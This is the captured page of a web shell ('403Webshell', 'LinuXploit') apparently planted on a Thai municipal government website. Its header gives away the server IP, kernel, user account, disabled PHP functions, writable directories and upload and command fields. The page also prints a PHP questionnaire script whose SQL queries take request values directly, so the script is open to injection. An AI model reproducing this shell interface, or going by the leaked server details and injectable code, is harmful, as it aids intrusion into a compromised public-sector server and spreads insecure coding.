403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.138.121.183
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/question/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/question//question_output.php
<?php
import_request_variables('pG', 'p_');
$question_id = $p_question_id;

$sel_q = "select * from cms_question where id_question = '$question_id'";
$que_q = mysql_query($sel_q);
$obj_q = mysql_fetch_assoc($que_q);

$navig['question&id_sub='.$p_id_sub] = $p_sub_name;
$navig['question_title'] = 'เพิ่มหัวข้อ';
navigator($navig);
echo"<br>";
bar_header($p_title); // Bar_Header
fieldset_top($obj_q['topic']);

//debuga($_POST);

$_title = select_max_query0('title_id', 'cms_question_title');
$title_id = $_title[0] == '' ? 1 : $_title[0];
$_title_order = select_max_query('title_order', 'cms_question_title', 'question_id', $question_id."' AND title_parent = '0");
$title_order = $_title_order[0] == '' ? 1 : $_title_order[0];
$ins_title = "INSERT INTO cms_question_title (title_id, title_name, title_parent, title_order, question_id, type_id) VALUES ('$title_id', '$p_title', '0', '$title_order', '$question_id', '$p_question_type')";
mysql_query($ins_title);
//echo '<br/><br/>';

$_data = select_max_query0('title_id', 'cms_question_title');
$data_id = $_data[0] == '' ? 1 : $_data[0];
foreach($_POST as $key => $data){
  if(strpos($key, 'data_') > -1){
    $_key = explode('_', $key);
    $order = $_key[1];
    $ins_data = "INSERT INTO cms_question_title (title_id, title_name, title_parent, title_order, question_id) VALUES ('$data_id', '$data', '$title_id', '$order', '$question_id')";
    mysql_query($ins_data);
//    echo '<br/>';
    ++$data_id;
  }
}
//echo '<br/>';

if($p_question_type == '2'){
  $array_choice = explode('#@+=', $p_all_choice);
  $_choice = select_max_query0('choice_id', 'cms_question_choice');//, 'title_id', $title_id);
  $choice_id = $_choice[0] == '' ? 1 : $_choice[0];
  $n = 1;
  foreach($array_choice as $choice){
    $ins_choice = "INSERT INTO cms_question_choice (choice_id, choice_name, choice_order, title_id, question_id) VALUES ('$choice_id', '$choice', '$n', '$title_id', '$question_id')";
    mysql_query($ins_choice);
//    echo '<br/>';
    ++$choice_id;
    ++$n;
  }
}else if($p_question_type == '3' || $p_question_type == '4'){
  if($p_add_other == '1'){
    ++$order;
    $ins_data = "INSERT INTO cms_question_title (title_id, title_name, title_parent, title_order, question_id, title_other) VALUES ('$data_id', 'อื่นๆ', '$title_id', '$order', '$question_id', '1')";
    mysql_query($ins_data);
//    echo '<br/>';
  }
}
//echo '<br/>';

echo msg_insert_data();			// ข้อความแสดงการผลการเพิ่มข้อมูล
refresh_data('index.php?mod=question&path=question&id_sub='.$p_id_sub, 1);	// กลับหน้าหลัก
?>

Youez - 2016 - github.com/yon3zu
LinuXploit